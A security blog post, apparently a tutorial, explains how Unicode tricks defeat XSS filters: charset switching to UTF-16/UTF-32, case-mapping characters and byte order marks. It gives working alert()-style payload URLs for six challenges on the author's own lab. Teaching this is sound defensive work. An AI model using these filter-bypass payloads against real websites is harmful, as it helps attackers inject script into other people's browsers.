Xssing Web Part 2 With Unicodes

xssing web with unicodes

This is the second part of “Xssing Web”. In this post I would show how to abuse unicodes to bypass XSS filters. 
BTW if you want to check previous part click here.

Note : If you think there are any mistakes in this post then kindly mention it in comments.

I have developed several XSS challenges to show how unicodes can be used to bypass filters. If you want to try those challenges first then click here, get back here if you couldn’t solve any.

Abusing Unicode :

So what is Unicode?

-> Unicode is nothing but the encoding standard. It defines UTF-8UTF-16,UTF-32, etc encodings.

1) UTF-8 :

Characters Size : 1 byte to 4 byte

Example :
Character “A” => 0x41
Character “¡”  => 0xC2 0xA1
Character “ಓ” => 0xE0 0xB2 0x93
Character “𪨶” => 0xF0 0xAA 0xA8 0xB6

2) UTF-16 :

Character Size : 2 byte

However in UTF-16 there are two ways to represent any characters.

i) UTF-16be (be- Big Endian) [Left to Right Byte Order ]

Example :
Character “A” => 0x00 0x41

ii) UTF-16le (le- Little Endian) [Right to Left Byte Order]

Example :
Character “A” => 0x41 0x00

3) UTF-32 :

Character Size : 4 byte

In UTF-32 also there are two ways to represent any character.

i) UTF-32be (be- Big Endian) [Left to Right Byte Order]

Example :
Character “A” => 0x00 0x00 0x00 0x41

ii) UTF-32le (le- Little Endian) [Right to Left Byte Order]

Example :
Character “A” => 0x41 0x00 0x00 0x00

Alright. Enough unicode theory.

Let’s see some XSS filters that you can bypass using unicode.

Challenge 1 :
http://rakeshmane.com/lab/unicode/xss.php?x=payload&charset=utf-8

How would you bypass it?
Think.

Hint : You can control the charset of html response.

No luck?
It’s simple, you just have to use UTF-16 encoding to bypass the filter. 

Solution :

http://rakeshmane.com/lab/unicode/xss.php?x=%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E%00&charset=utf-16be

Here we changed charset to “utf-16be” hence browser will treat page as UTF-16 big endian encoded page. In UTF-16 each character size is 2 bytes hence <svg/onload=alert()> becomes \x00<\x00s\x00v\x00g\x00/\x00o\x00n\x00l\x00o\x00a\x00d\x00=\x00a\x00l\x00e\x00r\x00t\x00(\x00)\x00>

Alright now let’s consider “UTF-16” string is filtered.

Challenge 2 :
http://rakeshmane.com/lab/unicode/xss1.php?x=payload&charset=utf-8

Now how would you bypass it?
Hint : You can control the charset of html response.

No luck?
It’s also very simple, you can simply use UTF-32 encoding to bypass the filter.

Solution : 

http://rakeshmane.com/lab/unicode/xss1.php?charset=UTF-32&x=%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

Note : When you don’t specify BE (Big Endian) or LE (Little Endian) then browsers by default consider encoding as “Big Endian” in UTF-32 and “Little Endian” in UTF-16 encoding.

BTW did you noticed I added two extra null bytes at the beginning of our payload?

%00%00%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

Let me explain why, since each character in UTF-32 is of 4 bytes size while reading the page browser will consider each 4 bytes as one character, so if there are say just 2 characters (2 bytes) before our payload then we must add two extra characters (bytes) to complete a character of 4 bytes so that browser won’t consume bytes from our payload while reading previous character.

Abusing Unicode Case Mappings :


Now let’s move towards unicode case mappings.

Lets see if there are any unicode characters which when mapped to upper or lower case transform to english alphabet letters.

I wrote a small JS code to obtain these characters. [You can get the code here]

We can use this unicode characters to bypass some of XSS filters.

Challenge 3 :

http://rakeshmane.com/lab/unicode/xss2.php?x=payload

Could you solve it?
Hint : Check above image

Let’s try to solve it , as you can see in above image we have a unicode character  ſ [\u017f] which when mapped to Upper Case turns into capital letter “S“. 

Our payload : <ſcript/src=./1></script>

Solution :  http://rakeshmane.com/lab/unicode/xss2.php?x=<%C5%BFcript/src=./1></script>

Now let’s make it little harder.

Challenge 4 :
http://rakeshmane.com/lab/unicode/xss3.php?x=payload

Could you XSS now?
No? Ah. It’s also very simple.

Let’s check above image again. You see there’s a unicode character ı [\u0131] which when mapped to Upper Case turns into capital letter “I“.

Our payload : <scrıpt/src=./1></script>

Solutionhttp://rakeshmane.com/lab/unicode/xss3.php?x=<scr%C4%B1pt/src=./1></script>

Now let’s try another challenge.

Challenge 5 :
http://rakeshmane.com/lab/unicode/xss4.php?x=payload

Try to solve it.
No luck? Get back to above image again. See unicode character K [\u212a] when mapped to Lower Case transforms to letter “k”.

Our payload : x oncliK=aler$t()

Solutionhttp://rakeshmane.com/lab/unicode/xss4.php?x=x onclic%e2%84%aa=aler$t()

Note : Since I couldn’t disable WAF , to bypass WAF I had to put ‘$’ in “aler$t()“.


Tool to convert unicode code points to UTF-8 bytes :

http://www.ltg.ed.ac.uk/~richard/utf-8.cgi?input=0131&mode=hex

Abusing BOM – Byte Order Mark :

What is BOM ?


For the 16- and 32-bit representations, a computer receiving text from arbitrary sources needs to know which byte order the integers are encoded in. Because the BOM itself is encoded in the same scheme as the rest of the document, but has a known value, the consumer of the text can examine these first few bytes to determine the encoding.

– Wikipedia


Note : The page must begin with the BOM character.

– BOM Character :


For UTF-16 Encoding:


Big Endian : 0xFE 0xFF 

Little Endian : 0xFF 0xFE


For UTF-32 Encoding:

Big Endian : 0x00 0x00 0xFE 0xFF 

Little Endian : 0xFF 0xFE 0x00 0x00

Alright. Here’s a small challenge. This challenge was actually posted by @rawsec

Challenge 6 :

http://rakeshmane.com/lab/unicode/xss5.php?q=payload

This is going to be hard one. 
Couldn’t solve it?

Hint : BOM

Still no luck?
Let me tell you one interesting thing about BOM character, it allows you to override charset of the page. The only requirement is that page should begin with this character.

So to override page encoding with UTF-16be you can use BOM character 0xFE 0xFF ,  for UTF-32be you can use 0x00 0x00 0xFE 0xFF.

UTF-16BE Solution

http://rakeshmane.com/lab/unicode/xss5.php?q=%fe%ff%00%3C%00s%00v%00g%00/%00o%00n%00l%00o%00a%00d%00=%00a%00l%00e%00r%00t%00(%00)%00%3E

UTF-32BE Solution

http://rakeshmane.com/lab/unicode/xss5.php?q=%00%00%fe%ff%00%00%00%3C%00%00%00s%00%00%00v%00%00%00g%00%00%00/%00%00%00o%00%00%00n%00%00%00l%00%00%00o%00%00%00a%00%00%00d%00%00%00=%00%00%00a%00%00%00l%00%00%00e%00%00%00r%00%00%00t%00%00%00(%00%00%00)%00%00%00%3E

That’s enough for today 🙂

References :

https://www.w3.org/International/questions/qa-byte-order-mark
https://en.wikipedia.org/wiki/Byte_order_mark
http://www.fileformat.info/info/unicode/utf8.htm
http://www.fileformat.info/info/charset/UTF-16/list.htm
https://github.com/numirias/ctf/blob/master/writeup-google-ctf-2017-geokitties-v2.md
https://stackoverflow.com/questions/4655250/difference-between-utf-8-and-utf-16
https://stackoverflow.com/questions/496321/utf-8-utf-16-and-utf-32

 

Source: Rakesh Mane’s Blog